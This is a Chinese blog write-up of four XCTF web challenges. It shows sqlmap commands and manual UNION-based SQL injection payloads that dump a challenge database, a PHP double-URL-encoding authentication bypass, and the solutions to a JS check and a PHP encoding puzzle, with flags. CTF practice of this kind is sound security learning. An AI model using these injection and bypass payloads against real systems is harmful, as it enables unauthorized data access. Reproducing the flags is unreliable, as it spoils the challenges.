攻防世界web解题[进阶](三)

最新推荐文章于 2023-06-04 10:38:32 发布
最新推荐文章于 2023-06-04 10:38:32 发布
阅读量508 收藏 1
点赞数
分类专栏: 《从0到1:CTFer成长之路》
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46703850/article/details/114415511
版权

攻防世界web解题[进阶](三)


介绍:记录解题过程

8.NewsCenter(sql注入)

.NewsCenter

题目描述:如题目环境报错,稍等片刻刷新即可

  • 首页
    在这里插入图片描述

<1>.使用Sqlmap

[1].sqlmap爆当前数据库信息

python sqlmap.py -r MyFile/bf.txt --current-db
  • 用sqlmap爆出库名:news
current database: 'news'

[2].sqlmap.列出指定数据库所有的表名

python sqlmap.py -r MyFile/bf.txt -D news --tables
  • 用sqlmap爆出表名:news,secret_table
Database: news
[2 tables]
+--------------+
| news         |
| secret_table |
+--------------+

[3].sqlmap 列出指定表名的所有列名

  • 先看news表
python sqlmap.py -r MyFile/bf.txt -D news  -T news --columns
  • 用sqlmap爆出列名,这个表就是存新闻的
Database: news
Table: news
[3 columns]
+---------+------------------+
| Column  | Type             |
+---------+------------------+
| content | text             |
| id      | int(10) unsigned |
| title   | varchar(50)      |
+---------+------------------+
  • 再看secret_table表
python sqlmap.py -r MyFile/bf.txt -D news  -T secret_table --columns
  • 用sqlmap爆出列名:fl4g ,就是他
Database: news
Table: secret_table
[2 columns]
+--------+------------------+
| Column | Type             |
+--------+------------------+
| fl4g   | varchar(50)      |
| id     | int(10) unsigned |
+--------+------------------+

[4].sqlmap 打印输出表名指定列名字段的值数据

python sqlmap.py -r MyFile/bf.txt -D news  -T secret_table -C fl4g --dump
  • 得到flag
Database: news
Table: secret_table
[1 entry]
+--------------------------+
| fl4g                     |
+--------------------------+
| QCTF{sq1_inJec7ion_ezzz} |
+--------------------------+

<2>.手工注入

[1].判断注入类型

  • 没有回显,先用字符型注入试试

[2].爆当前数据库信息

1union select 1,2,database()#
  • 回显
2
news

[3].通过库名获取表名

1' union select 1,2,table_name from information_schema.tables where table_schema=‘news’#
  • 回显
2
news     
2    
secret_table

[4].通过表名获取字段名:

1' union select 1,2,column_name from information_schema.columns
where table_name=‘secret_table’#
  • 回显
2
fl4g
2
id

[5].最后通过字段名获取flag

1' union select 1,id,fl4g from secret_table#
  • 回显
1
QCTF{sq1_inJec7ion_ezzz}

9.NaNNaNNaNNaN-Batman(得源码,删过滤)

题目描述:暂无
题目场景: 暂无
题目附件: 附件1

  • 下载附件1来看
  • 解压后看的是乱码,修改后缀名为.html用浏览器打开
  • 把内容部分执行函数eval修改为alert,弹窗显示正常。
    在这里插入图片描述
  • 代码
function $(){
    var e=document.getElementById("c").value;
    if(e.length==16)
        if(e.match(/^be0f23/)!=null)
            if(e.match(/233ac/)!=null)
                if(e.match(/e98aa$/)!=null)
                    if(e.match(/c7be9/)!=null){
                        var t=["fl","s_a","i","e}"];
                        var n=["a","_h0l","n"];
                        var r=["g{","e","_0"];
                        var i=["it'","_","n"];
                        var s=[t,n,r,i];
                        for(var o=0;o<13;++o){
                            document.write(s[o%4][0]);
                            s[o%4].splice(0,1)
                        }
                    }
                }
                document.write('<input id="c"><button οnclick=$()>Ok</button>');
                delete _
  • 即然源码在我们手上,将限制条件全部删除就能得到flag
  • 将下面删除限制条件后的代码保存为html文件运行即可得到flag
<html>
    <script type="text/javascript">
    var t=["fl","s_a","i","e}"];
    var n=["a","_h0l","n"];
    var r=["g{","e","_0"];
    var i=["it'","_","n"];
    var s=[t,n,r,i];
    for(var o=0;o<13;++o){
        document.write(s[o%4][0]);
        s[o%4].splice(0,1)
    }
    alert(s)
</script >

</html>
  • 得到flag
    在这里插入图片描述

10.web2(解密加密算法)

题目描述:解密

  • 源码
<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";

function encode($str){
    $_o=strrev($str);
    // echo $_o;
        
    for($_0=0;$_0<strlen($_o);$_0++){
       
        $_c=substr($_o,$_0,1);
        $__=ord($_c)+1;
        $_c=chr($__);
        $_=$_.$_c;   
    } 
    return str_rot13(strrev(base64_encode($_)));
}

highlight_file(__FILE__);
/*
   逆向加密算法,解密$miwen就是flag
*/
?>

  • 根据提示去解密

  • 这个加密算法非常简单,就是先把所有字符反转(如 abc -> cba),再将所有字符变成ASCII 码值加1后又变回字符(效果就是 a -> b ,c->d…),再对数据进行编码,后面再把所有字符反转,再把每一个字母在字母表中向前移动 13 个字母.

  • 所以假如加密abc,结果就是

  • 源码(详细注释)

<!DOCTYPE html>
<html>
<body>
<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
function encode($str){
    $_o=strrev($str);//strrev() 函数反转字符串。abc -> cba
    $_ = "";

    for($_0=0;$_0<strlen($_o);$_0++){
        $_c=substr($_o,$_0,1); //截取字符串 $rest = substr ("abcdef", 1, 3); // returns "bcd"
        $__=ord($_c)+1;  //int ord ( string$string)返回字符串 string 第一个字符的 ASCII 码值。该函数是chr()的互补函数。
        $_c=chr($__);  //返回相对应于 $__ 所指定的单个字符
        $_=$_.$_c;
    }
    
	# 使用base64_encode和base64_decode对数据进行编码和解码
    # strrev() 函数反转字符串
    # str_rot13() 函数对字符串执行 ROT13 编码。
    # ROT13 编码是把每一个字母在字母表中向前移动 13 个字母得到。数字和非字母字符保持不变。
    # 提示:编码和解码都是由相同的函数完成的。如果您把一个已编码的字符串作为参数,那么将返回原始字符串。
    return str_rot13(strrev(base64_encode($_)));
}
echo encode("abd");
?>
</body>
  • 接下来就是编写解密算法了,解密算法可以由上而上写
  • 解密算法代码:
<!DOCTYPE html>
<html>
<body>
<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";

function dncode($str){
    $str = base64_decode(strrev(str_rot13($str)));
    $_ = "";
    for($_0=0;$_0<strlen($str);$_0++){
        $_c=substr($str,$_0,1);
        $__=ord($_c)-1;
        $_c=chr($__);
        $_=$_.$_c;
    }
    return strrev($_);
}
echo dncode($miwen);
?>
</body>
</html>
  • flag:
flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

11.PHP2

题目描述:暂无

  • 首页
Can you anthenticate to this website?
你能复制到这个网站吗?
  • index.phps存在源码泄露:
<?php
if("admin"===$_GET[id]) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

Can you anthenticate to this website?
  • 这里要绕过第一个if判断进入第二个if
    将 admin经过两次url编码即可:
admin
%61%64%6d%69%6e
%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65
  • flag
cyberpeace{e4c6f42874dd488d9b7b79b7d1026ec6}
一个平凡de人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
brcm_patchram_plus.c
12-03
brcm_patchram_plus 蓝牙固件下载程序。Linux 安卓 蓝牙固件引导程序
嵌入式arm linux蓝牙文件传输移植
Legend(谭海燕)的专栏
02-09 1万+
嵌入式arm linux蓝牙文件传输移植目前,蓝牙技术已经比较成熟,特别是基于手机和PC得蓝牙文件传输。 本文主要讲述基于嵌入式arm linux蓝牙文件传输。    现行2.6.x的linux内核都已经集成了bluez蓝牙驱动,对于2.4版本内核的需要到bluez官方网站下载并安装bluez蓝牙驱动。http://www.bluez.org/download/    本为基于2.6版本的内核讲
Linux下Bluetooth HCI Command的实现
baozhongchao的专栏
10-26 4627
Linux下写Bluetooth程序,首先接触到的就是使用HCI Command来设置Bluetooth Modules(USB Bluetooth dongle)。那这些HCI command在blueZ中是如何实现的呢?举例说明。if ((ctl = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI)) 在此之前,因为hci_sock.c已经被bui
arm linux 串口 蓝牙,arm linux串口藍牙工具移植使用
weixin_28990983的博客
05-07 420
ap6212中串口藍牙在linux下的使用記錄一、linux藍牙工具移植主要使用到的工具及相關庫如下:bluez-libs-3.36libxml2-2.7.4dbus-1.0.2glib-2.24.2bluez-utils-3.36openobex-1.5下載相應的源碼解壓,按照上面的順序進行編譯.bluez-libs-3.36中增加mk.sh內容如下#!/bin/sh./configure --...
Tina Linux 蓝牙BT调试命令和方法-RealTek系列、Ampak系列、芯之联XR系列
11-17 3914
Tina Linux 蓝牙BT调试方法-RealTek系列、Ampak系列、芯之联XR系列 目前主要是基于全志平台Tina Linux系统操作的,模组也都是市场比较常见的,主要是瑞昱科技的8723ds等等,正基Ampak系列的AP6236/6212/6256等等,以及XR829等模组。 驱动一般都很少有问题,而且是和wifi共用的,所以这里就不在分析了,有问题留言讨论。 BT固件加载: AP系列:不同的模块型号对应不同的BT固件,一般是hcd后缀的,比如AP6236对应的BT...
linuxlinux平台下串口调试工具minicom的使用总结
iriczhao的博客
03-05 1万+
写在前面 minicom是Linux下常用的串口调试工具,可以将其移植到自己的目标板卡上,用于板卡串口的调试。minicom的移植和运行需要ncurses库的支持。 一、ncurses 下载链接 https://directory.fsf.org/wiki/Ncurses 具体步骤如下: 1、构建配置 ./configure --prefix=/home/iriczhao/embedderTools/serialDebugTools/BUILD_OUTPUT_ncurse-6.2 --host=arm-li
调试Bluetooth时的一些札记
likeping的专栏
01-12 4937
LCL层是BT的链路控制功能的一部分,它从软件或被命令配置或控制的其他控制器上取命令,然后执行链路控制任务。 蓝牙技术的系统结构分为三大部分:底层硬件模块、中间协议层和高层应用。底层硬件部分包括无线跳频(RF)、基带(BB)和链路管理(LM)。无线跳频层通过2.4GHz无需授权的ISM频段的微波,实现数据位流的过滤和传输,本层协议主要定义了蓝牙收发器在此频带正
android蓝牙的调试(博通蓝牙工作 and 低功耗模式)
视频拼接器
12-08 1万+
首先结合项目从整体上去把握这部分: 蓝牙模块中一个比较核心的文件是bluetooth.c, 在我们上电的时候, 会调用这个文件中bt_enable()这个函数, 在这个函数里面先调用set_bluetooth_power()上电,然后调用property_set("ctl.start", "hciattach"), 去启动hciattach这个服务,从而运行brcm_patchram_plus这
Linux 内核蓝牙驱动移植
最新发布
weixin_51332399的博客
06-04 843
Linux 内核蓝牙驱动移植
移植 usb 蓝牙适配器到 arm
广佛浪人的专栏
01-16 1991
移植 usb 蓝牙适配器到 arm 板   (2014-09-14 23:44:45) 载▼ 标签:  linux   arm   蓝牙   移植 分类: linux_develop 操作环境  win7 vmware fedora 10 usb 蓝牙适配器  tq2440  内核 2.6.30   
minicom-linux下的arm串口调试工具
04-01
linux arm串口调试代码工具,做arm linux移植开发是很方便的助手。
arm-linux详细的串口调试(适合初学者)
04-27
适合初学者,对于arm-inux的串口进行掌握,很方便的从超级终端和串口工具看到数据的发送与接收。
Tiny4412 ARM开发环境搭建—Minicom串口工具安装及配置
micro虾米的博客
01-14 2847
Tiny4412 ARM开发环境搭建 Tiny4412 ARM开发环境搭建 简介 在64位系统上安装32位的库 安装工具 1 安装及配置串口工具以Minicom为例 11 Windows系统连接串口 12 Linux系统连接串口 13 虚拟机Linux系统连接串口 1. 简介 2. 在64位系统上安装32位的库 ARM开发板是 如果使用的系统是64位的,
嵌入式 linux 蓝牙 C开发
Donven的博客
03-07 1万+
最近公司准备搞蓝牙,从年前折腾环境到年后开发板上折腾应用,搞了好久,看了好多资料跟请教大神,终于搞定了。项目情况:有个远程蓝牙设备(服务端)会发送数据,现有一个外接蓝牙适配器,要在开发板开发应用程序,通过蓝牙适配器连接那个蓝牙设备,接收蓝牙设备发送的数据。前期开发板的环境搭建,参考这个博客,很详细了http://blog.csdn.net/gatieme/article/details/48751...
ARM平台上蓝牙协议栈Bluez的移植使用和配置
热门推荐
OSKernelLAB(gatieme)
10-22 4万+
版权所有,载请注明出处http://blog.csdn.net/gatieme/article/details/48751743 参考 http://blog.csdn.net/lizzywu/article/details/7662110 http://blog.csdn.net/colorant/article/details/2590654 前言blue简介蓝牙(Bluet
ARM嵌入式 ARM Linux移植 USB 蓝牙、交叉编译 bluez 各种版本
u011408697的专栏
03-19 6136
一、基本说明:目前在嵌入式 Linux使用 USB 蓝牙模块,比较好的解决方法就是使用 Linux 官方协议栈 bluez,这同时也是 PC 及 Android 手机上使用蓝牙协议栈,可以说还是比较靠谱的。但是!不得不说,bluez 有多种版本,如 bluez-2.25、bluez-3.36、bluez-4.95、bluez-5.28 等,每个大版本从交叉编译、使用方法到内部原理、配置方法都区
linux bluetooth
橘子熊v
10-16 1789
一 、底层kernel的配置情况 [*] Networking support —> /Unix socket配置/ Networking options —> <*> Unix domain sockets /* Bluetooth子系统配置 */ <*> Bluetooth subsystem support —>
linux设备驱动之串口移植
yimu13的专栏
09-10 1万+
对于串口驱动的移植准备自己分析一下源代码的,但是发现自己好多地方都只知道一些皮毛,不明白其中的道理,所以我上网搜的时候发现有好多人写了很多很好的文章了,下面我载的这篇就非常不错,一个困恼我好久的问题是驱动代码中只是注册了platform驱动,而platform设备注册在哪里?这
ARM嵌入式常用开发工具介绍及插画开发流程(更新)
shinfocom
09-28 259
这里接着前边的开发环境的配置说,其实用于开发的话,基本的开发环境已经架构好了,不过由于嵌入式开发环境的特殊性(交叉编译),我们还会用到一些其他的外围工具,这里做简要的说明。并重新介绍一下整个开发环境中,各个工具使用,及一个简单应用的开发流程。 SecureCRT : 串口输出显示工具、SSHclient 。 SecureCRT是一款支持SSH(SSH1和SSH2)的终端仿真程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值